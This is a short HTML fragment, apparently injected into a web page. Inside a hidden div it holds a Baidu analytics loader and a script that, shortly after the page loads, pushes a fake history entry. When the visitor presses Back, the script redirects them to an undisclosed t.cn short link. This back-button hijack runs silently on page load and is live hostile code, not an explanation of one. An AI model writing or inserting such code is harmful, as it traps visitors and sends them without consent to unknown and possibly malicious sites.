<div style="display: none;">
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?a4eccf58e89b8ad1df8a947822092e7b";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
<script language="javascript">
  window.onhashchange = function(){
      jp();
  };
  function hh(){
      history.pushState(history.length + 1,'message','#' + new Date().getTime());
  }
  function jp(){
      document.location.href = 'http://t.cn/REBinvc';
  }
  setTimeout('hh()',100);
</script>
</div>